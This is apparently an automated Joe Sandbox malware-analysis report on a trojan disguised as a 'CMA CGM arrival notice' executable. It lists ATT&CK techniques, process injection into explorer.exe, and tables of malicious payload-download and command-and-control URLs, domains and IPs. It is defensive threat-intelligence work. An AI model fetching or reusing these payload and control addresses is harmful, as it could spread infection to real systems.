Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules (1) | Path Interception | Process Injection (512) | Rootkit (1) | Credential API Hooking (1) | Security Software Discovery (421) | Remote Services | Credential API Hooking (1) | Exfiltration Over Other Network Medium | Encrypted Channel (11) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion (22) | Input Capture (1) | Virtualization/Sandbox Evasion (22) | Remote Desktop Protocol | Input Capture (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (512) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Archive Collected Data (1) | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information (1) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (114) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information (2) | LSA Secrets | System Information Discovery (12) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 (1) | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing (1) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 482590; Sample: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe; Startdate: 13/09/2021; Architecture: WINDOWS; Score: 100

Signatures on the start node: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 11 other signatures

Process tree as rendered in the graph (the graph image itself is not reproduced here):

NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (started)
  Signatures: Tries to detect Any.run; Hides threads from debuggers
  > NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (started)
    Network: www.paulassinkarchitect.nl 91.184.0.38, 443, 49817 HOSTNETNL Netherlands
    Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
    > explorer.exe (injected)
      Network: www.microsoftjob.com 91.195.240.117, 49830, 80 SEDO-ASDE Germany; everythingswallow.com 160.153.136.3, 49824, 80 GODADDY-AMSDE United States; 10 other IPs or domains
      Signatures: System process connects to network (likely due to code injection or exploit)
      > rundll32.exe (started)
        Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        > cmd.exe (started)
          > conhost.exe (started)

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source | Detection | Scanner | Label
NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | 25% | Virustotal |
NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | 19% | ReversingLabs | Win32.Trojan.Mucc

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

Source | Detection | Scanner | Label
14.2.rundll32.exe.a04480.0.unpack | 100% | Avira | TR/Dropper.Gen
14.2.rundll32.exe.4d6f834.4.unpack | 100% | Avira | TR/Dropper.Gen

      Domains

      No Antivirus matches

      URLs

Source | Detection | Scanner | Label
http://i2.cdn-image.com/__media__/pics/12471/logo.png) | 0% | Avira URL Cloud | safe
http://www.rlmwebcreations.com/Parental_Control.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er | 0% | Avira URL Cloud | safe
http://www.acooll.com/kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 | 0% | Avira URL Cloud | safe
https://www.paulassinkarchitect.nl/bin_fDiyu115.bin? | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/pics/12471/search-icon.png) | 0% | Avira URL Cloud | safe
http://www.rlmwebcreations.com | 0% | Avira URL Cloud | safe
http://www.beckyhartpcpublishers.com/kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2 | 0% | Avira URL Cloud | safe
https://www.paulassinkarchitect.nl/bin_fDiyu115.bin | 0% | Avira URL Cloud | safe
https://www.paulassinkarchitect.nl/bin_fDiyu115.bin7 | 0% | Avira URL Cloud | safe
http://www.everythingswallow.com/kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 | 0% | Avira URL Cloud | safe
www.acooll.com/kbl2/ | 0% | Avira URL Cloud | safe
http://www.wxsjykj.com/kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/pics/12471/libg.png) | 0% | Avira URL Cloud | safe
http://www.rlmwebcreations.com/Anti_Wrinkle_Creams.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO | 0% | Avira URL Cloud | safe
https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0 | 0% | Avira URL Cloud | safe
http://www.microsoftjob.com/kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 | 0% | Avira URL Cloud | safe
http://www.rlmwebcreations.com/Top_Smart_Phones.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er | 0% | Avira URL Cloud | safe
https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf | 0% | Avira URL Cloud | safe
http://www.rlmwebcreations.com/Cheap_Air_Tickets.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E | 0% | Avira URL Cloud | safe
http://www.taylormakeyourlife.com/kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/pics/12471/arrow.png) | 0% | Avira URL Cloud | safe
https://www.paulassinkarchitect.nl/bin_fDiyu115.binqs | 0% | Avira URL Cloud | safe
https://www.paulassinkarchitect.nl/ | 0% | Avira URL Cloud | safe
http://www.rlmwebcreations.com/song_lyrics.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3ErTA9i3 | 0% | Avira URL Cloud | safe
http://www.priorpublic.com/kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg) | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/pics/12471/libgh.png) | 0% | Avira URL Cloud | safe
https://www.paulassinkarchitect.nl/bin_fDiyu115.binW | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/pics/12471/bodybg.png) | 0% | Avira URL Cloud | safe
http://i2.cdn-image.com/__media__/js/min.js?v2.2 | 0% | URL Reputation | safe
http://www.rlmwebcreations.com/Best_Penny_Stocks.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E | 0% | Avira URL Cloud | safe
http://www.rlmwebcreations.com/10_Best_Mutual_Funds.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrO | 0% | Avira URL Cloud | safe
http://www.rlmwebcreations.com/display.cfm | 0% | Avira URL Cloud | safe
http://www.rlmwebcreations.com/kbl2/?X8sl8h70=ocgDBp8RB | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Reputation
taylormakeyourlife.com | 34.102.136.180 | true | false | unknown
www.microsoftjob.com | 91.195.240.117 | true | true | unknown
www.paulassinkarchitect.nl | 91.184.0.38 | true | true | unknown
everythingswallow.com | 160.153.136.3 | true | true | unknown
www.wxsjykj.com | 142.111.236.6 | true | true | unknown
www.rlmwebcreations.com | 209.99.40.222 | true | true | unknown
www.acooll.com | 54.65.172.3 | true | true | unknown
www.priorpublic.com | 44.227.76.166 | true | true | unknown
beckyhartpcpublishers.com | 34.102.136.180 | true | false | unknown
www.taylormakeyourlife.com | unknown | unknown | true | unknown
www.everythingswallow.com | unknown | unknown | true | unknown
www.beckyhartpcpublishers.com | unknown | unknown | true | unknown
www.dominionhavanese.com | unknown | unknown | true | unknown

                                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.acooll.com/kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 | true | Avira URL Cloud: safe | unknown
http://www.beckyhartpcpublishers.com/kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 | false | Avira URL Cloud: safe | unknown
https://www.paulassinkarchitect.nl/bin_fDiyu115.bin | true | Avira URL Cloud: safe | unknown
http://www.everythingswallow.com/kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 | true | Avira URL Cloud: safe | unknown
www.acooll.com/kbl2/ | true | Avira URL Cloud: safe | low
http://www.wxsjykj.com/kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 | true | Avira URL Cloud: safe | unknown
http://www.microsoftjob.com/kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 | true | Avira URL Cloud: safe | unknown
http://www.taylormakeyourlife.com/kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 | false | Avira URL Cloud: safe | unknown
http://www.priorpublic.com/kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 | true | Avira URL Cloud: safe | unknown

                                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://i2.cdn-image.com/__media__/pics/12471/logo.png) | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rlmwebcreations.com/Parental_Control.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.paulassinkarchitect.nl/bin_fDiyu115.bin? | NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/12471/search-icon.png) | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rlmwebcreations.com | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2 | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.paulassinkarchitect.nl/bin_fDiyu115.bin7 | NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/12471/libg.png) | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rlmwebcreations.com/Anti_Wrinkle_Creams.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0 | NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.value-domain.com/ | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | | high
http://www.rlmwebcreations.com/Top_Smart_Phones.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rlmwebcreations.com/Cheap_Air_Tickets.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/12471/arrow.png) | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.paulassinkarchitect.nl/bin_fDiyu115.binqs | NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://www.paulassinkarchitect.nl/ | NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258590873.000000000098E000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://www.rlmwebcreations.com/song_lyrics.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3ErTA9i3 | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg) | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/12471/libgh.png) | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.paulassinkarchitect.nl/bin_fDiyu115.binW | NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/12471/bodybg.png) | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.value-domain.com/modall.php | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | | high
http://i2.cdn-image.com/__media__/js/min.js?v2.2 | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.rlmwebcreations.com/Best_Penny_Stocks.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rlmwebcreations.com/10_Best_Mutual_Funds.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrO | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rlmwebcreations.com/display.cfm | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rlmwebcreations.com/kbl2/?X8sl8h70=ocgDBp8RB | rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

                                    Contacted IPs

                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.117 | www.microsoftjob.com | Germany | 47846 | SEDO-ASDE | true
209.99.40.222 | www.rlmwebcreations.com | United States | 40034 | CONFLUENCE-NETWORK-INCVG | true
142.111.236.6 | www.wxsjykj.com | United States | 18779 | EGIHOSTINGUS | true
54.65.172.3 | www.acooll.com | United States | 16509 | AMAZON-02US | true
160.153.136.3 | everythingswallow.com | United States | 21501 | GODADDY-AMSDE | true
34.102.136.180 | taylormakeyourlife.com | United States | 15169 | GOOGLEUS | false
91.184.0.38 | www.paulassinkarchitect.nl | Netherlands | 197902 | HOSTNETNL | true
44.227.76.166 | www.priorpublic.com | United States | 16509 | AMAZON-02US | true

                                    General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 482590
Start date: 13.09.2021
Start time: 22:51:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 13s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Suspected Instruction Hammering Hide Perf
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/0@10/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 35.8% (good quality ratio 28.1%)
• Quality average: 58.4%
• Quality standard deviation: 37.6%
HCA Information:
• Successful, ratio: 60%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 20.82.210.154, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 40.126.31.142, 40.126.31.136, 40.126.31.3, 20.190.159.137, 40.126.31.5, 40.126.31.140, 20.190.159.131, 20.190.159.135, 20.49.150.241
• Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, www.tm.lg.prod.aadmsa.akadns.net, settings-win.data.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

Match: 91.195.240.117

Associated Sample Name / URL | Detection | Context
Data Sheet and Profile.exe | malicious | www.cultivandomiser.com/cfns/?-ZPH=6lTd&lrz8IB0=6xUAq83ZO5fi2Fff2OSkrOgUtBVBX1rr8vpo+DGg/XUo+EPleFUMXJoT/N2HAF+XkCtWSJfdRw==
Order no.1480-G22-21202109.xlsx | malicious | www.dollyvee.com/b6a4/?4hxTxl=7Ma1uFfOwwXoBVM9/3/nTuvNRWfdfzafPuPNoecBehxmPDpo/gtAdrpd7cxdB3qLolO3Tw==&Or=KZ7XHDep
Required quantity.doc | malicious | www.tectostore.com/9t6k/?pTbpPjP=ue/LL+VEScgzHFlZhsBhfkvHpMJHDIcb88PJfgceb0bwkVvI5k+lKCjDWCTPnZFQnfkZqg==&JP64Xd=HtPL
chUG6brzt9.exe | malicious | www.techstorecorp.com/if60/?lJBdIl=SM7xjP5Zp5wI1WQaLEPCx7BIU9fma969F7zB1K/NXZq+3em3XhOMpl9v1Tk4LbaS02T6&JFNL8L=b6AlHZk8w
grace $$.exe | malicious | www.naturalcreativesociety.com/t75f/?9rQ8pPi=ng1gUciQzgWrkc7x43aA82EVbEMT2iq+eK31hSQmNeNxyGrb83oEVqYghMmnVBqf7yfr&yN=XhApmDXh
SOA.exe | malicious | www.artepohome.com/imm8/?6lL0I=C8M2yJQGrmTjyeMAqMDG+jr6dOXYPNgE4LKEBWUCgmJI87hBYSpCHy+LGWRkqFsy9T78&ZTwlaN=6l-pU
SI44IRV68H.exe | malicious | www.thesmarterhold.com/24ng/?E0DH=/RUhEfaGQc1tk36ijjLyDMWHK9i4Zc8eYCCrOLXK9tHErjiWGJ7u19MBkH3udAEnTOAv3wWehA==&kZ3=9rmLXx
ALL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. Aug 26, 2021.exe | malicious | www.thedigitalmgr.com/uytf/?OFQPcTtx=3DzbAeHjVNSf3BC/ZPmgbNgG2GlplBK7FZZa2ihHNJTvzSZhfzWl4y7QrghZ17QIPS1N&WzrxP=7nsxLJGh4
0001.exe | malicious | www.sledder.store/rht6/?1bbh=2duHZ8O0&w84PKtm=nhUyj8i2e/zjjIH58DYwkFYz31DgrYCLicZcdqRyj0VaWYU7/POaWYomerWR/wHvo+2D
OswYbjULpg.exe | malicious | www.bottleandaura.com/b5i8/?3f=7Roy7p1ddWO/lzxPyHV5lZFxyruwvOckZY4dW0uxVt6RyIfYvKAICYZ7oP9rXaULvoe6&a6AtX=U8n09JXHdvdlGN
PAYMENT ADVICE.exe | malicious | www.piadineriae45.com/bp39/?6lTp=BiGm5qmIOyDRXvSMgTHKvr7AyM7NtOAx1g87TzWKkmZxOjaaiYZeQMFg8WKehfVZ3bve&kd3=7nx4e8sXT
Remittance Slip.exe | malicious | www.e-basvuru-hizmetleri.com/noi6/?O4=dHNozHTHJV2jS/i1vQm3J3nT8ESosqJfvBBpR7nhuisPbpoIGSB4rWRt/2/WFPktsfGb&Kp-PId=1bt0xL-palqH2DO
v86Jk19LUb.exe | malicious | www.kegeratorcollective.com/nthe/?GDK8P=TEXoZwb2jrmcmLsyP3+rObuSJbtCbLHns9PRr2qYeyzbY/h7fB0SxHgQg+HU4u8WxKFm&jN9d=4hKL3DKXV
catalogo campione_0021.exe | malicious | www.ehizmetgirisi-turkiyegovt.com/p3q8/?QPK=5jV4hVZ&XjEP7rn=fiPr0X1p4F9ZWvtZtgkJbLMcy2liE3CgpEcqYTa0y+iRIMBDNCaFdVS1LAfXYpPGJznYV3tkWg==
0039234_00533MXS2.exe | malicious | www.speakerzz.com/m64e/?H2MDD=sdJXcVCtfzqqGpggXi5fr53QRADmc98yBRT/cxAhHWB39xbuHdKZfcLkV5gdLPrrWA1J&DxoLn=7nU4v4ghr2A8WLZ
Pending DHL Shipment Notification REF 9-02-21.exe | malicious | www.solutionexperts.xyz/ssee/?Uri=v9nJs+Q9O5vKsgynQOxt+ZgMYVncEF7IS0bghgtMSLC/lp1k2vjOy8hGEp+Al2hnpeGtLUIPfw==&XJ=7naHrvwPI2wH38w0
Unpaid Invoice.exe | malicious | www.thestripcitydeli.com/b6cu/?Sjlpi=9ruD_h9&WFN=22anG4gNe5W6Njf5WY0clMzJQonbnd9uEDHLW+Sl1cKYhM1CopvlsdHThni+dEkRkZZO
Quotation#QO210109A87356.exe | malicious | www.ahlstromclothes.com/ssee/?lN=MhdemHby4eJzARfVnWQ6LcCJmvLgyMCJzQ3B3FORQKcf+2rLbU5Qlle6XtBru1bAyhoeZ260CQ==&b6A4=I0D0xDXp1p9t
DOCS.exe | malicious | www.artepohome.com/imm8/?h0=C8M2yJQGrmTjyeMAqMDG+jr6dOXYPNgE4LKEBWUCgmJI87hBYSpCHy+LGWRkqFsy9T78&_v00R=OFNTqp7PC
Proforma Invoice.pdf.exe | malicious | www.1upshopandstuff.com/gm9w/?sPJpgz=FBZx&5j3hLd_=tOqTmujo6cjv09TVTlk3niw3h43AtKyRVrmGtkkk7ikZTfbUK1bDeB/flG803ZYk22ZtLuT/Qg==

                                    Domains

                                    No context

                                    ASN

Match: SEDO-ASDE

Associated Sample Name / URL | Detection | Context
PO-PT. Hextar-Sept21.xlsx | malicious | 91.195.240.94
P.O100%uFFFDpayment.doc__.rtf | malicious | 91.195.240.94
Data Sheet and Profile.exe | malicious | 91.195.240.117
Order 45789011.exe | malicious | 91.195.240.13
Quotation Required Details.exe | malicious | 91.195.240.94
54U89TvWvD.exe | malicious | 91.195.240.87
Order no.1480-G22-21202109.xlsx | malicious | 91.195.240.117
BK8476699_BOOKING.exe | malicious | 91.195.240.87
Swift 07.09.21.exe | malicious | 91.195.240.87
Required quantity.doc | malicious | 91.195.240.117
chUG6brzt9.exe | malicious | 91.195.240.117
BahcfFNy25bmV1c.exe | malicious | 91.195.240.13
grace $$.exe | malicious | 91.195.240.117
DUE INVOICES.exe | malicious | 91.195.240.94
SOA.exe | malicious | 91.195.240.117
SI44IRV68H.exe | malicious | 91.195.240.117
VM Accord, ORDER TKHA-A88160011B.pdf.exe | malicious | 91.195.240.13
Order_confirmation_ SMKT 09062021_.exe | malicious | 91.195.240.94
ALL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. Aug 26, 2021.exe | malicious | 91.195.240.117
Swift.exe | malicious | 91.195.240.87

                                    JA3 Fingerprints

Match: 37f463bf4616ecd445d4a1937da06e19

Associated Sample Name / URL | Detection | Context
Q3 order 455647483 10-09-2021 document.exe | malicious | 91.184.0.38
remittance advice_010021.exe | malicious | 91.184.0.38
Document.exe | malicious | 91.184.0.38
C8mREWTLU6.exe | malicious | 91.184.0.38
lnEQQp4F8R.exe | malicious | 91.184.0.38
noJB1GBDPi.exe | malicious | 91.184.0.38
KKmaeWyiu5.exe | malicious | 91.184.0.38
GBUNFa2vpY.exe | malicious | 91.184.0.38
